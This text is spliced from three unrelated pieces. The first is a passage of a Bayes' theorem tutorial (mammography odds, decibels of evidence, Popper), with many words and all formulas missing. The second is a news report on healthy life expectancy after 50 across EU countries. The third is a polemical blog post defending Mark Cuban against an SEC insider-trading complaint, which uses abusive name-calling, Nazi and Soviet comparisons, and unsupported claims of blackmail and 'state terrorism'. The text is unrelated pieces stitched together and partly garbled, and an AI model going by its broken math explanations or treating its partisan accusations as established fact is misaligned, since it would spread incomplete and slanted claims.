One way to solve this problem would be to take the revised probability for a positive mammography , which we already calculated as 7.8 % , and plug that into the Tams - Braylor test as the new prior probability .
If we do this , we find that the result comes out to 60 % .
But this assumes that first we see the positive mammography result , and then the positive result on the Tams - Braylor .
What if first the woman gets a positive result on the Tams - Braylor , followed by a positive result on her mammography .
Intuitively , it seems like it should n't matter .
Does the math check out ?
First we 'll administer the Tams - Braylor to a woman with a 1 % prior probability of breast cancer .
Then we administer a mammography , which gives 80 % true positives and 9.6 % false positives , and it also comes out positive .
Lo and behold , the answer is again 60 % .
( If it 's not exactly the same , it 's due to rounding error - you can get a more precise calculator , or work out the fractions by hand , and the numbers will be exactly equal . )
An algebraic proof that both strategies are equivalent is left to the reader .
To visualize , imagine that the lower bar of the frequency applet for mammography projects an even lower bar using the probabilities of the Tams - Braylor Test , and that the final lowest bar is the same regardless of the order in which the conditional probabilities are projected .
We might also reason that since the two tests are independent , the probability a woman with breast cancer gets a positive mammographya positive Tams - Braylor is 90 % * 80 % = 72 % .
And the probability that a woman without breast cancer gets false positives on mammography and Tams - Braylor is 5 % * 9.6 % = 0.48 % .
So if we wrap it all up as a single test with a likelihood ratio of 72%/0.48 % , and apply it to a woman with a 1 % prior probability of breast cancer :... we find once again that the answer is 60 % .
Suppose that the prior prevalence of breast cancer in a demographic is 1 % .
Suppose that we , as doctors , have a repertoire of three independent tests for breast cancer .
Our first test , test A , a mammography , has a likelihood ratio of 80%/9.6 % = 8.33 .
The second test , test B , has a likelihood ratio of 18.0 ( for example , from 90 % versus 5 % ) ; and the third test , test C , has a likelihood ratio of 3.5 ( which could be from 70 % versus 20 % , or from 35 % versus 10 % ; it makes no difference ) .
Suppose a patient gets a positive result on all three tests .
What is the probability the patient has breast cancer ?
Here 's a fun trick for simplifying the bookkeeping .
If the prior prevalence of breast cancer in a demographic is 1 % , then 1 out of 100 women have breast cancer , and 99 out of 100 women do not have breast cancer .
So if we rewrite theof 1 % as anthe odds are :
And the likelihood ratios of the three tests A , B , and C are : Thefor women with breast cancer who score positive on all three tests , versus women without breast cancer who score positive on all three tests , will equal :
To recover the probability from the odds , we just write :
This always works regardless of how the odds ratios are written ; i.e. , 8.33:1 is just the same as 25:3 or 75:9 .
It does n't matter in what order the tests are administered , or in what order the results are computed .
The proof is left as an exercise for the reader .
E. T. Jaynes , in " Probability Theory With Applications in Science and Engineering " , suggests that credibility and evidence should be measured in decibels .
Decibels ?
Decibels are used for measuring exponential differences of intensity .
For example , if the sound from an automobile horn carries 10,000 times as much energy ( per square meter per second ) as the sound from an alarm clock , the automobile horn would be 40 decibels louder .
The sound of a bird singing might carry 1,000 times less energy than an alarm clock , and hence would be 30 decibels softer .
To get the number of decibels , you take the logarithm base 10 and multiply by 10 .
Suppose we start with a prior probability of 1 % that a woman has breast cancer , corresponding to an odds ratio of 1:99 .
And then we administer three tests of likelihood ratios 25:3 , 18:1 , and 7:2 .
Youmultiply those numbers ... or you could just add their logarithms :
It starts out as fairly unlikely that a woman has breast cancer - our credibility level is at - 20 decibels .
Then three test results come in , corresponding to 9 , 13 , and 5 decibels of evidence .
This raises the credibility level by a total of 27 decibels , meaning that the prior credibility of - 20 decibels goes to a posterior credibility of 7 decibels .
So the odds go from 1:99 to 5:1 , and the probability goes from 1 % to around 83 % .
Just for fun , try and work this one out in your head .
You do n't need to be exact - a rough estimate is good enough .
When you 're ready , continue onward .
According to a study performed by Lawrence Phillips and Ward Edwards in 1966 , most people , faced with this problem , give an answer in the range 70 % to 80 % .
Did you give a substantially higher probability than that ?
If you did , congratulations - Ward Edwards wrote that very seldom does a person answer this question properly , even if the person is relatively familiar with Bayesian reasoning .
The correct answer is 97 % .
The likelihood ratio for the test result " red chip " is 7/3 , while the likelihood ratio for the test result " blue chip " is 3 / 7 .
Therefore a blue chip is exactly the same amount of evidence as a red chip , just in the other direction - a red chip is 3.6 decibels of evidence for the red bag , and a blue chip is - 3.6 decibels of evidence .
If you draw one blue chip and one red chip , they cancel out .
So theof red chips to blue chips does not matter ; only theof red chips over blue chips matters .
There were eight red chips and four blue chips in twelve samples ; therefore , fourred chips than blue chips .
Thus the posterior odds will be : which is around 30:1 , i.e. , around 97 % .
The prior credibility starts at 0 decibels and there 's a total of around 14 decibels of evidence , and indeed this corresponds to odds of around 25:1 or around 96 % .
Again , there 's some rounding error , but if you performed the operations using exact arithmetic , the results would be identical .
We can now seethat the bookbag problem would have exactly the same answer , obtained in just the same way , if sixteen chips were sampled and we found ten red chips and six blue chips .
What is the sequence of arithmetical operations that you performed to solve this problem ? ( 45%*30 % ) / ( 45%*30 % + 5%*70 % ) Similarly , to find the chance that a woman with positive mammography has breast cancer , we computed :
The fully general form of this calculation is known asorGiven some phenomenon A that we want to investigate , and an observation X that is evidence about A - for example , in the previous example , A is breast cancer and X is a positive mammography - Bayes '
Theorem tells us how we shouldour probability of A , given theX.
By this point , Bayes '
Theorem may seem blatantly obvious or even tautological , rather than exciting and new .
If so , this introduction hasin its purpose .
So why is it that some people are soabout Bayes ' Theorem ?
" Do you believe that a nuclear war will occur in the next 20 years ?
If no , why not ? "
Since I wanted to use some common answers to this question to make a point about rationality , I went ahead and asked the above question in an IRC channel , # philosophy on EFNet .
One EFNetter who answered replied " No " to the above question , but added that he believed biological warfare would wipe out " 99.4 % " of humanity within the next ten years .
I then asked whether he believed 100 % was a possibility .
" No , " he said .
" Why not ? " , I asked .
" Because I 'm an optimist , " he said .
( Roanoke of #philosophy on EFNet wishes to be credited with this statement , even having been warned that it will not be cast in a complimentary light .
Good for him ! )
Another person who answered the above question said that he did n't expect a nuclear war for 100 years , because " All of the players involved in decisions regarding nuclear war are not interested right now . "
" But why extend that out for 100 years ? " , I asked .
" Pure hope , " was his reply .
What is itthat makes these thoughts " irrational " - a poor way of arriving at truth ?
There are a number of intuitive replies that can be given to this ; for example : " It is not rational to believe things only because they are comforting . "
Of course it is equally irrational to believe things only because they arethe second error is less common , but equally irrational .
Other intuitive arguments include the idea that " Whether or not you happen to be an optimist has nothing to do with whether biological warfare wipes out the human species " , or " Pure hope is not evidence about nuclear war because it is not an observation about nuclear war .
" There is also a mathematical reply that is precise , exact , and contains all the intuitions as special cases .
This mathematical reply is known as Bayes ' Theorem .
For example , the reply " Whether or not you happen to be an optimist has nothing to do with whether biological warfare wipes out the human species " can be translated into the statement : p( you are currently an optimist | biological war occurs within ten years and wipes out humanity ) =p ( you are currently an optimist | biological war occurs within ten years and does not wipe out humanity ) Since the two probabilities forandare equal , Bayes '
Theorem says that ; as we have earlier seen , when the two conditional probabilities are equal , the revised probability equals the prior probability .
If X and A are unconnected - statistically independent - then finding that X is true cannot be evidence that A is true ; observing X does not update our probability for A ; saying " X " is not an argument for A .
But suppose you are arguing with someone who is verbally clever and who says something like , " Ah , but since I 'm an optimist , I 'll have renewed hope for tomorrow , work a little harder at my dead - end job , pump up the global economy a little , eventually , through the trickle - down effect , sending a few dollars into the pocket of the researcher who ultimately finds a way to stop biological warfare - so you see , the two events are related after all , and I can use one as valid evidence about the other . "
In one sense , this is correct - correlation , no matter how weak , is fair prey for Bayes ' Theorem ; Bayes '
Theorem distinguishes between weak and strong evidence .
That is , Bayes '
Theorem not only tells us what is and is n't evidence , it also describes theof evidence .
Bayes '
Theorem not only tells usto revise our probabilities , butto revise our probabilities .
A correlation between hope and biological warfare may exist , but it 's a lot weaker than the speaker wants it to be ; he is revising his probabilities much too far .
Let 's say you 're a woman who 's just undergone a mammography .
Previously , you figured that you had a very small chance of having breast cancer ; we 'll suppose that you read the statistics somewhere and so you know the chance is 1 % .
When the positive mammography comes in , your estimated chance should now shift to 7.8 % .
There is no room to say something like , " Oh , well , a positive mammography is n't definite evidence , some healthy women get positive mammographies too .
I do n't want to despair too early , and I 'm not going to revise my probability until more evidence comes in .
Why ?
Because I 'm a optimist . "
And there is similarly no room for saying , " Well , a positive mammography may not be definite evidence , but I 'm going to assume the worst until I find otherwise .
Why ?
Because I 'm a pessimist . "
Your revised probability should go to7 .
8 % , no more , no less .
Bayes '
Theorem describes what makes something " evidence " and how much evidence it is .
Statistical models are judged by comparison to thebecause , in statistics , the Bayesian method is as good as it gets - the Bayesian method defines the maximum amount of mileage you can get out of a given piece of evidence , in the same way that thermodynamics defines the maximum amount of work you can get out of a temperature differential .
This is why you hear cognitive scientists talking about .
In cognitive science , is the technically precise codeword that we use to meanThere are also a number of general heuristics about human reasoning that you can learn from looking at Bayes ' Theorem .
For example , in many discussions of Bayes '
Theorem , you may hear cognitive psychologists saying that peoplemeaning that when people approach a problem where there 's some evidence X indicating that condition A might hold true , they tend to judge A's likelihood solely by how well the evidence X seems to match A , without taking into account the prior frequency of A .
If you think , for example , that under the mammography example , the woman 's chance of having breast cancer is in the range of 70 % - 80 % , then this kind of reasoning is insensitive to the prior frequency given in the problem ; it does n't notice whether 1 % of women or 10 % of women start out having breast cancer .
" Pay more attention to the prior frequency ! " is one of the many things that humans need to bear in mind to partially compensate for our built - in inadequacies .
A related error is to pay too much attention to p( X|A ) and not enough to p( X|~A ) when determining how much evidence X is for A .
The degree to which a result X isdepends , not only on the strength of the statementbut also on the strength of the statementFor example , if it is raining , this very strongly implies the grass is wet - but seeing that the grass is wet does n't necessarily mean that it has just rained ; perhaps the sprinkler was turned on , or you 're looking at the early morning dew .
Sinceis substantially greater than zero , is substantially less than one .
On the other hand , if the grass waswet when it was n't raining , then knowing that the grass was wet wouldshow that it was raining , , even if ; that is , even if the grass only got wet 50 % of the times it rained .
Evidence is always the result of thebetween the two conditional probabilities .
evidence is not the product of a very high probability that A leads to X , but the product of a veryprobability thatcould have led to X .
Theis fueled , not only by more and more cognitive scientists suddenly noticing that mental phenomena have Bayesian structure in them ; not only by scientists in every field learning to judge their statistical methods by comparison with the Bayesian method ; but also by the idea that The Bayesian revolutionaries hold that when you perform an experiment and get evidence that " confirms " or " disconfirms " your theory , this confirmation and disconfirmation is governed by the Bayesian rules .
For example , you have to take into account , not only whether your theory predicts the phenomenon , but whether other possible explanations also predict the phenomenon .
Previously , the most popular philosophy of science was probably Karl Popper 's - this is the old philosophy that the Bayesian revolution is currently dethroning .
Karl Popper 's idea that theories can be definitely falsified , but never definitely confirmed , is yet another special case of the Bayesian rules ; if - if the theory makes a definite prediction - then observing ~X very strongly falsifies A .
On the other hand , if , and we observe X , this does n't definitely confirm the theory ; there might be some other condition B such that , in which case observing X does n't favor A over B .
For observing X to definitely confirm A , we would have to know , not that , but that , which is something that we can't know because we can't range over all possible alternative explanations .
For example , when Einstein 's theory of General Relativity toppled Newton 's incredibly well - confirmed theory of gravity , it turned out that all of Newton 's predictions were just a special case of Einstein 's predictions .
You can even formalize Popper 's philosophy mathematically .
The likelihood ratio for X , , determines how much observing X slides the probability for A ; the likelihood ratio is what saysX is as evidence .
Well , in your theory A , you can predict X with probability 1 , if you like ; but you can't control the denominator of the likelihood ratio , - there will always be some alternative theories that also predict X , and while we go with the simplest theory that fits the current evidence , you may someday encounter some evidence that an alternative theory predicts but your theory does not .
That 's the hidden gotcha that toppled Newton 's theory of gravity .
So there 's a limit on how much mileage you can get from successful predictions ; there 's a limit on how high the likelihood ratio goes forevidence .
On the other hand , if you encounter some piece of evidence Y that is definitelypredicted by your theory , this isstrong evidenceyour theory .
Ifis infinitesimal , then the likelihood ratio will also be infinitesimal .
For example , ifis 0.0001 % , andis 1 % , then the likelihood ratiowill be 1:10000 .
- 40 decibels of evidence !
Or flipping the likelihood ratio , ifisthenwill bemeaning that observing Y greatly favors ~A over A. Falsification is much stronger than confirmation .
This is a consequence of the earlier point thatevidence is not the product of a very high probability that A leads to X , but the product of a veryprobability thatcould have led to X .
This is the precise Bayesian rule that underlies the heuristic value of Popper 's falsificationism .
Similarly , Popper 's dictum that an idea must be falsifiable can be interpreted as a manifestation of the Bayesian conservation - of - probability rule ; if a result X is positive evidence for the theory , then the result ~X would have disconfirmed the theory to some extent .
If you try to interpret both X and ~X as " confirming " the theory , the Bayesian rules say this is impossible !
To increase the probability of a theory youexpose it to tests that can potentially decrease its probability ; this is not just a rule for detecting would - be cheaters in the social process of science , but a consequence of Bayesian probability theory .
On the other hand , Popper 's idea that there isfalsification andas confirmation turns out to be incorrect .
Bayes '
Theorem shows that falsification isevidence compared to confirmation , but falsification is still probabilistic in nature ; it is not governed by fundamentally different rules from confirmation , as Popper argued .
So we find that many phenomena in the cognitive sciences , plus the statistical methods used byscientists , plus the scientific method itself , are all turning out to be special cases of Bayes ' Theorem .
Hence the Bayesian revolution .
Why wait so long to introduce Bayes '
Theorem , instead of just showing it at the beginning ?
Well ... because I 've tried that before ; and what happens , in my experience , is that people get all tangled up in trying to apply Bayes '
Theorem as a set ofinstead of the Theorem helping , it becomesso that in addition to trying to remember how many women with breast cancer have positive mammographies , the reader is also trying to remember whether it ' sin the numerator or , and whether a positive mammography result corresponds to A or X , and which side ofis the implication , and what the terms are in the denominator , and so on .
In this excruciatingly gentle introduction , I tried to show all the workings of Bayesian reasoningever introducing the explicit Theorem as something extra to memorize , hopefully reducing the number of factors the reader needed to mentally juggle .
Even if you happen to be one of the fortunate people who can easily grasp and apply abstract theorems , the mental - juggling problem is still something to bear in mind if you ever need to explain Bayesian reasoning to someone else .
If you do find yourself losing track , my advice is to forget Bayes ' Theorem as anand think about thep ( A ) and p( ~A ) are at the top .
p( X|A ) and p( X|~A ) are the projection factors .
p( X&A ) and p ( X&~A ) are at the bottom .
And p( A|X ) equals the proportion of p ( X&A ) within p( X&A ) + p( X& ~A ) .
The graph is n't shown here - but can you see it in your mind ?
And if thinking about the graph does n't work , I suggest forgetting about Bayes '
Theorem entirely - just try to work out the specific problem in gizmos , hoses , and sparks , or whatever it is .
Having introduced Bayes '
Theorem explicitly , we can explicitly discuss its components .
We 'll start with p( A|X ) .
If you ever find yourself getting confused about what 's A and what 's X in Bayes ' Theorem , start with p( A|X ) on the left side of the equation ; that 's the simplest part to interpret .
A is the thing we want to know about .
X is how we 're observing it ; X is the evidence we 're using to make inferences about A. Remember that for every expression p( Q|P ) , we want to know about the probability for Q given P , the degree to which P implies Q - a more sensible notation , which it is now too late to adopt , would bep( Q|P ) is closely related to p( Q&P ) , but they are not identical .
Expressed as a probability or a fraction , p( Q&P ) is the proportion of things that have property Q and property P withini.e. , the proportion of " women with breast cancer and a positive mammography " within the group of If the total number of women is 10,000 , and 80 women have breast cancer and a positive mammography , then p( Q&P ) is 80/10,000 = 0.8 % .
You might say that the absolute quantity , 80 , is being normalized to a probability relative to the Or to make it clearer , suppose that there 's a group of 641 women with breast cancer and a positive mammography within a total sample group of 89,031 women .
641 is the absolute quantity .
If you pick out a random woman from thethen theyou'll pick a woman with breast cancer and a positive mammography is p( Q&P ) , or 0.72 % ( in this example ) .
On the other hand , p( Q|P ) is the proportion of things that have property Q and property P withini.e. , the proportion of women with breast cancer and a positive mammography within the group of If there are 641 women with breast cancer and positive mammographies , 7915 women with positive mammographies , and 89,031 women , then p( Q&P ) is the probability of getting one of those 641 women if you 're picking at random from the entire group of 89,031 , while p( Q|P ) is the probability of getting one of those 641 women if you 're picking at random from the smaller group of 7915 .
In a sense , really means , but specifying the extra P all the time would be redundant .
You alreadyit has property P , so the property you 'reis Q - even though you 're looking at the size of group Q&P within group P , not the size of group Q within group P ( which would be nonsense ) .
This is what it means to take the property on the right - hand side asit means you know you 're working only within the group of things that have property P .
When you constrict your focus of attention to see only this smaller group , many other probabilities change .
If you 're taking P asthen p( Q&P ) equals just p ( Q ) - at least , Thep ( Q ) , the frequency of " things that have property Q within the entire sample " , is revised to the new frequency of " things that have property Q within the subsample of things that have property P " .
If P isif P is our entire world , then looking for Q&P is the same as looking for just Q.
If you constrict your focus of attention to only the population of eggs that are painted blue , then suddenly " the probability that an egg contains a pearl " becomes a different number ; this proportion is different for the population of blue eggs than the population of all eggs .
Thethe property that constricts our focus of attention , is always on theside of p( Q|P ) ; the P becomes our world , the entire thing we see , and on the other side of the " given " P always has probability 1 - that is what it means to take P as given .
So p( Q|P ) means " If P has probability 1 , what is the probability of Q? " or " If we constrict our attention to only things or events where P is true , what is the probability of Q ? " Q , on the other side of the given , iscertain - its probability may be 10 % or 90 % or any other number .
So when you use Bayes ' Theorem , and you write the part on the left side as p( A|X ) - how tothe probability of A after seeing X , the new probability of Athat we know X , the degree to which XA - you can tell that X is always theor theand A is the property being investigated , the thing you want to know about .
The right side of Bayes '
Theorem is derived from the left side through these steps :
The first step , to , may look like a tautology .
The actual math performed is different , though .is a single number , the normalized probability or frequency of A within the subgroup X.are usually the percentage frequencies of X&A and X within the entire sample , but the calculation also works if X&A and X are absolute numbers of people , events , or things .
is a single percentage / frequency / probability , always between 0 and 1.can be measured either in probabilities , such as 0.008/0.103 , or it might be expressed in groups of women , for example 194/2494 .
As long as both the numerator and denominator are measured in the same units , it should make no difference .
Going fromin the denominator tois a very straightforward step whose main purpose is as a stepping stone to the last equation .
However , one common arithmetical mistake in Bayesian calculations is to divideby , instead of dividingby .
For example , someone doing the breast cancer calculation tries to get the posterior probability by performing the math operation 80 / 950 , instead of 80 / ( 80 + 950 ) .
I like to think of this as a rose - flowers error .
Sometimes if you show young children a picture with eight roses and two tulips , they 'll say that the picture contains more roses than flowers .
( Technically , this would be called a class inclusion error . )
You have tothe roses and the tulips to get the number of , which you need to find the proportion of rosesthe flowers .
You can't find the proportion of roses in the tulips , or the proportion of tulips in the roses .
When you look at the graph , the bottom bar consists ofthe patients with positive results .
That 's what the doctor sees - a patient with a positive result .
The question then becomes whether this is a healthy patient with a positive result , or a cancerous patient with a positive result .
To figure the odds of that , you have to look at the proportion of cancerous patients with positive results within all patients who have positive results , because again , " a patient with a positive result " is what you actually see .
You can't divide 80 by 950 because that would mean you were trying to find the proportion of cancerous patients with positive results within the group of healthy patients with positive results ; it 's like asking how many of the tulips are roses , instead of asking how many of the flowers are roses .
Imagine using the same method to find the proportion ofpatients .
You would divide 950 by 80 and find that 1,187 % of the patients were healthy .
Or to be exact , you would find that 1,187 % of cancerous patients with positive results were healthy patients with positive results .
The last step in deriving Bayes '
Theorem is going fromto , in both the numerator and the denominator , and fromto , in the denominator .
Why ?
Well , one answer is because p( X|A ) , p( X|~A ) , and p( A ) correspond to the initial information given in all the story problems .
But why were the story problems written that way ?
Because in many cases , p( X|A ) , p( X|~A ) , and p( A ) are what we actuallyand this in turn happens because p( X|A ) and p( X|~A ) are often the quantities that directly describewith the other quantities derived from them and p( A ) asFor example , p( X|A ) , the implication from A to X , where A is what we want to know and X is our way of observing it , corresponds to the implication from a woman having breast cancer to a positive mammography .
This is not just abut aa woman gets a positive mammographyshe has breast cancer .
The mammography isto detect breast cancer , and it is a fact about the physical process of the mammography exam that it has an 80 % probability of detecting breast cancer .
As long as the design of the mammography machine stays constant , p( X|A ) will stay at 80 % , even if p( A ) changes - for example , if we screen a group of woman with other risk factors , so that the prior frequency of women with breast cancer is 10 % instead of 1 % .
In this case , p( X&A ) will change along with p( A ) , and so will p ( X ) , p( A|X ) , and so on ; but p( X|A ) stays at 80 % , because that 's a fact about the mammography exam itself .
( Though you do need to test this statement before relying on it ; it 's possible that the mammography exam might work better on some forms of breast cancer than others . ) p( X|A ) is one of thefacts from which complex facts like p( X&A ) are constructed ; p( X|A ) is ancausal relation within a complex system , and it has a direct physical interpretation .
This is why Bayes '
Theorem has the form it does ; it 's not for solving math brainteasers , but for reasoning about the physical universe .
Once the derivation is finished , all the implications on the right side of the equation are of the formor , while the implication on the left side is .
As long as you remember this and you get the rest of the equation right , it should n't matter whether you happened to start out with p( A|X ) or p( X|A ) on the left side of the equation , as long as the rules are applied - if you started out with the direction of implication p( X|A ) on the left side of the equation , you would need to end up with the direction p( A|X ) on the right side of the equation .
This , of course , is just changing the variable labels ; the point is to remember the symmetry , in order to remember the structure of Bayes ' Theorem .
The symmetry arises because the elementaryare generally implications from facts to observations , i.e. , from breast cancer to positive mammography .
The elementaryare generally implications from observations to facts , i.e. , from a positive mammography to breast cancer .
The left side of Bayes ' Theorem is an elementarystep from the observation of positive mammography to the conclusion of an increased probability of breast cancer .
Implication is written right - to - left , so we writeon the left side of the equation .
The right side of Bayes '
Theorem describes the elementarysteps - for example , from breast cancer to a positive mammography - and so the implications on the right side of Bayes '
Theorem take the formorAnd that 's Bayes ' Theorem .
Rational inference on the left end , physical causality on the right end ; an equation with mind on one side and reality on the other .
Remember how the scientific method turned out to be a special case of Bayes ' Theorem ?
If you wanted to put it poetically , you could say that Bayes ' Theorem binds reasoning into the physical universe .
Okay , we 're done .
Periods of healthy old age vary widely , the researchers found .
The health of older Europeans varies widely between countries , even in those with longer life expectancies , a report has claimed .
The study found people in Estonia , Latvia and Finland had fewer years of good health after the age of 50 .
People in the UK fare relatively well , enjoying nearly 20 years on average .
The lead authors of the Lancet study , from Leicester University , said the figures could help governments plan for future health needs .
BREAKDOWN FOR MEN
Life expectancy / healthy years after age 50 UK : 79.5/19.7 Sweden : 80.3/20.2 France : 79.6/18.0 Spain : 79.5/19.2 Austria : 79.1/14.5 Germany : 79.0/13.6 Finland : 78.5/12.9 Denmark : 78.3/23.6 Estonia : 72.4/9.0 Latvia : 71.3/11.0
The researchers collected data on life - expectancy , then surveyed older people from each country to find out whether they felt that illness had limited their ability to carry out normal activities .
This was used to calculate how many " healthy life years " a man and woman from each EU country could expect after their 50th birthday .
In some cases , this revealed problems not immediately apparent by just looking at life expectancy charts .
For example , Austrian men and women can expect to live on average to 79 and almost 84 respectively .
However , only half of their years after 50 will be free of ill - health , according to the figures .
In Germany and Finland , the gap between life expectancy and healthy years is even worse .
The newest entrants to the EU , already recording lower life expectancies than established members , appear to have populations blighted by chronic illness in old age .
In Estonia , men live on average to just under 73 years old , and women to over 80 - but men can expect only nine years ' good health after 50 , and women only a year more than this .
UK ' average '
While the UK has a generally lower life expectancy than some other EU states , its " healthy life year " score suggests that the health gap is not as wide as suggested by life expectancy alone .
BREAKDOWN FOR WOMEN
Life expectancy / healthy years after age 50 UK : 82.7/20.8 France : 85.4/19.7 Spain : 85.0/18.6 Finland : 84.1/13.9 Sweden : 84.0/20.3 Austria : 83.7/15.7 Germany : 83.0/13.5 Denmark : 81.9/24.1 Estonia : 80.5/10.4 Latvia : 79.3/12.7
Men here can expect to live until almost 80 , and women to more than 82 .
However , for men , almost 20 years of this will be in good health , and just over 20 for women .
This compares to Spanish women , who live to 85 , but can expect fewer of those extra years to be healthy ones .
Lead researcher Professor Carol Jagger , from Leicester University , said : " What we have here , for the very first time , is data we can really compare .
" And it really questions whether the countries with the longest life expectancies are the healthiest .
" In the case of the UK , we are looking pretty average , but slightly better than our life expectancy figures suggest . "
She said that the figures might be useful to governments who are trying to work out the number of older people able to remain working , or who will need health care .
The results might mean that an EU target of increasing the number of older people working might be a difficult one to meet .
" Without an improvement in the state of health of older people , it will be difficult to raise the retirement age or bring more older workers into the workforce for certain EU countries . "
John Appleby , from the health policy think tank The King 's Fund , said that the figures threw up some " interesting differences " between countries .
He said : " I 'm not entirely surprised by the results for the UK .
It possibly partly reflects a better health and welfare system which supports older people in this country .
" This is an area which is often missed out in comparisons between countries .
Life expectancy on its own is quite a crude measure , and just does n't tell you about the quality of that life . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
DIGG THIS
During an NBA contest between the Dallas Mavericks and the Utah Jazz several years ago , a shoving match at the low post quickly mutated into a bench - clearing brawl .
In time - honored pro sports fashion , the fans were treated to the spectacle of world - class athletes conducting an empty and largely harmless pantomime of actual violence .
Somehow , Mavericks owner Mark Cuban ended up on the floor at the periphery of the mle .
Cuban , a legitimate self - made billionaire internet entrepreneur , can usually be found sitting court - side .
With splendid indifference to the informal rules of team owner decorum , Cuban can be found mingling with the fans and hurling abuse at opposing players and officials alike .
So when the scuffle erupted , Cuban figured he ’d get a taste of the action — or at least a suitable substitute that he could enjoy at a minimum safe distance .
The following day , Cuban made a comment to the effect that he wanted a piece of Jazz power forward Karl Malone .
This gesture was a bit like an asthma hound Chihuahua calling out a cape buffalo .
I found myself admiring Cuban ’s audacity even as I entertained doubts about his sanity .
Only recently did I learn that Cuban , in addition to being a wildly successful businessman and a genuinely brilliant if occasionally abrasive person , is an individualist whose favorite author is Ayn Rand .
Cuban ’s favorite book is The Fountainhead , which in my view was Rand ’s best work ; Cuban claims to have re-read it on several occasions , and was prepared to finance an updated version of the film .
( The 1949 film , in my view , is among the finest movie adaptations from a novel , surpassed only by the pitch - perfect 1962 adaptation of To Kill a Mockingbird . )
Much to his credit , Cuban ’s defiant individualism extends to more important matters than court - side deportment .
He provoked the theatrical condemnation of coprocephalic talk show goon Bill O’Reilly by offering to bankroll the cinematic distribution of the 9 - 11 revisionist documentary Loose Change , which presented evidence that the Black Tuesday atrocity was an “ inside job " by the Bush Regime , which sought a pretext for war with ( inter alia ) Saddam Hussein ’s Iraq .
O’Reilly , who suffers a severe histaminic reaction whenever he ’s exposed to critical thinking , insisted that Loose Change was a “ diversion ” from the sacred war on terror that should n’t be “ given a platform ” of the sort Cuban offered .
Cuban riposted that since the film was already in circulation on the internet and through other samizdat channels , it made more sense to bring it out in the open and confront its claims honestly .
“ I ’m not going to back away from a topic because it ’s controversial , ” Cuban promised , doubtless causing O’Reilly ’s wattles to become empurpled with outrage .
Cuban ’s talk radio exchange with O’Reilly apparently was overheard by Jeffrey B. Morris , a Ft. Worth attorney employed by the Securities and Exchange Commission ( SEC ) , one of the Regime ’s most corrupt and useless enforcement appendages .
Inconsolably offended that someone would insult the supposed honor of his Fhrer , Norris appears to have fashioned some kind of derogatory depiction of Cuban and threatened to make it public ; this , it seems , prompted Cuban to threaten action of some kind in defense of his reputation .
The New York Times reproduced key excerpts of e-mail correspondence between Norris and Cuban :
" Previously , I thought you were merely foolish and naïve .
Now , however , I see that you are also a hypocrite .
I guess your belief in free speech has severe limitations .
If someone else is the victim of an absurd conspiracy theory , you defend your right to participate in smearing the good name of a patriot like President Bush .
But , when you are the subject of a parody of the attack you have endorsed , you suddenly issue threats .
I think I will e-mail this to Chairman Cox myself .
I think he will enjoy it .
I ’m sure he is also a Laker fan .
Since Chairman
Cox may not know the background , I will explain .
[ The following would be sent to Cox by Norris . ]
Mark Cuban is the owner of the Dallas Mavericks and has participated in distributing the vicious and absurd documentary , " Loose Change , " which posits that President Bush planned the demolition of the World Trade Center as a pretext for going to war against Iraq .
We have had some past exchanges about my opinion the Mr. Cuban ’s support for this project is irresponsible and immoral .
Below , I parodied his position that every opinion , no matter how absurd and vicious , deserves to be broadly disseminated . "
It ’s difficult to see how this could be interpreted as anything other than a blackmail threat , best summarized as follows : “ Withdraw your support for Loose Change , and retract your unpatriotic smear of our Dear Leader , or I ’ll take up this matter with someone who can really mess your s**t up . "
This was apparently the first time Cuban had attracted the malevolent attention of the SEC ’s " Patriotism Enforcement " division .
He may have provoked official retaliation by his most recent effort to expose official squalor to the disinfecting rays of public sunlight .
Cuban has underwritten the investigative website BailoutSleuth.com , which is devoted to chronicling and exposing the details of the largest economic crime in history :
The theft of trillions of dollars from the middle class to cushion the financial collapse of politically favored Wall Street welfare whores .
Not too long ago , Cuban only had to worry about being criticized by the likes of Bill O’Reilly and paying NBA fines for criticizing the most corrupt officials in professional sports .
His willingness to finance this indispensable exercise in forensic journalism has made him an Official Enemy of the Ruling Oligarchy and exposed him to retaliation from the Regime .
On November 17 , the SEC announced it was filing a civil complaint against Cuban alleging that he had been involved in “ insider trading ” four years ago .
The SEC complaint is really weak beer .
It alleges that in 2004 , the CEO of a Canadian internet company called Mamma.com notified Cuban — at the time the company ’s largest shareholder — that the company was going to raise capital through a PIPE ( Public Investment in Private Equity ) offering .
Reportedly offered a chance to participate , Cuban allegedly became very upset , believing ( correctly , as it happened ) that a PIPE offering would dilute the value of his own holdings .
Cuban supposedly complained that he was “ screwed ” because he “ could n’t sell ” his stock on the basis of privileged information , and would simply have to take a beating .
Yet , according to the complaint , Cuban did arrange to unload his entire share in Mamma.com before the PIPE offering was made public .
This , according to the SEC , was “ securities fraud [ committed ] by engaging in insider trading , ” and that by engaging in this purported fraud “ Cuban avoided losses in excess of $ 750,000 . ”
The “ evidence ” adduced in the complaint amounts to Cuban ’s word against that of an unspecified accuser , filtered in such a way that parts of it amount to second - hand hearsay .
The merits of the evidence aside , I ’m of the opinion that the activity called “ insider trading ” is an artifact of corrupt prosecutorial ambition , as opposed to a description of a legitimate crime of fraud .
It ’s worth remembering that last September the SEC , which would have us believe Mark Cuban is a menace to honest commerce , actually banned short - selling the stocks of financial institutions whose rotted foundations were visibly disintegrating .
This ban was imposed , according to the SEC , in order to “ restore falling stock prices that have shattered confidence in the financial markets … . ”
Well … no .
That ban was imposed to keep the stock prices of fatally corrupt financial institutions artificially high .
It was more than simply a vulgar political manipulation of the market ; it was an act of Soviet - style intimidation in the service of a politically necessary fiction for the benefit of the favored , fraudulent few on Wall Street .
Herr Paulson , Comrade Bernanke , and their enablers and minions have redistributed an estimated five trillion dollars into the hands of impenitent fraud artists and thieves .
The architects of that crime insist that they owe no accounting to anybody for their actions .
Thanks to the bailout legislation extorted from Congress under the literal threat of state terrorism , there is no mechanism of public accountability for this process .
Mr. Cuban , who is among the most successful entrepreneurs of our time , recognizes a critical market gap when he sees it .
He also has an honest man ’s impatience with self - serving bovine residue .
Hence his decision to fund BailoutSleuth.com , which immediately began to exhume and publicize fetid details regarding carefully redacted crony contracts , the squalid compensation arrangements for the mendicant Wall Street nomenklatura , and other invaluable details regarding this world - historic crime .
So now the same official financial enforcement apparatus that is laboring to put hundreds of billions or even trillions of dollars into the hands of unreconstructed Wall Street criminals has targeted Mark Cuban for ruin over a purported offense involving $ 750,000 .
This is like Stalin and Vyshinsky taking a breather from the work of slaughtering millions of human beings in order to prosecute someone for cruelty to animals .
